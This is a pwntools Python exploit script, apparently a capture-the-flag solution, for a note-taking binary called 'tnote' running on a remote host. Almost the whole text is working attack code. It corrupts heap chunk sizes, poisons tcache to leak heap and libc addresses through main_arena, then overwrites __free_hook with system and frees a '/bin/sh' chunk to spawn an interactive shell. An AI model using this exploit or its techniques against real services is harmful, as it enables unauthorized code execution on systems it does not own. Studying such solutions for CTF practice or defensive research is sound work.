1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88
| import sys import os from pwn import *
binary = "./tnote" ip = "**.**.**.**" port = 10000 elf = ELF(binary) def pwn(ip, port, debug): if debug == 1: sh = process(binary) lib = elf.libc else: sh = remote(ip, port) lib = ELF("libc-2.27.so") s = lambda data :sh.send(str(data)) sa = lambda delim,data :sh.sendafter(str(delim), str(data)) sl = lambda data :sh.sendline(str(data)) sla = lambda delim,data :sh.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :sh.recv(numb,timeout=5) ru = lambda delims, drop=True :sh.recvuntil(delims, drop,timeout=5) irt = lambda :sh.interactive() uu32 = lambda data :u32(data.ljust(4, b'\x00')) uu64 = lambda data :u64(data.ljust(8, b'\x00')) lg = lambda data :log.success(data) def add(size): sla(":","A"); sla("?",str(size)); def free(idx): sla(":","D"); sla("?",str(idx)) def edit(idx,content): sla(":","E") sla("?",str(idx)) sa(":",content) def show(idx): sla(":","S") sla("?",str(idx)) add(0x18) add(0x18) add(0x58) add(0x18) add(0x78) payload = "\x11" * 0x18 + p8(0x81) edit(0,payload) free(1) add(0x78) free(4) payload = "\x11" * 0x18 + p64(0x81) + "\n" edit(1,payload) free(2) payload = "\x11" * 0x18 + p64(0xdeadbeefdeadbeef) + "\n" edit(1,payload) show(1) ru("\x11" * 0x18 + p64(0xdeadbeefdeadbeef)) heap_base = uu64(r(6)) - 0x320 payload = "\x11" * 0x18 + p64(0x81) payload += p64(heap_base + 0x10) + "\n" edit(1,payload) add(0x78) add(0x78) payload = p64(0) * 4 + p64(0x0f0f0f0f0f0f0f0f) + p64(0) * 9 + p64(heap_base + 0x10) + "\n" edit(4,payload) free(4) add(0x78) show(4) ru("content:") main_arena = uu64(r(6)) success("main_arena = "+hex(main_arena)) libc = main_arena - lib.symbols[b'__malloc_hook'] - 96 - 0x10 success("libc = "+hex(libc)) lib.address = libc system = lib.symbols[b'system'] __free_hook = lib.symbols[b'__free_hook'] success("libc_base = "+hex(libc)) success("sys_addr = "+hex(system)) payload = p64(0) * 4 + p64(0x0f0f0f0f0f0f0f0f) + p64(0) * 9 + p64(__free_hook - 8) + "\n" edit(4,payload) add(0x78) edit(5,"/bin/sh\x00" + p64(system) + "\n") free(5) irt()
if __name__ == '__main__': pwn(ip, port, 0)
|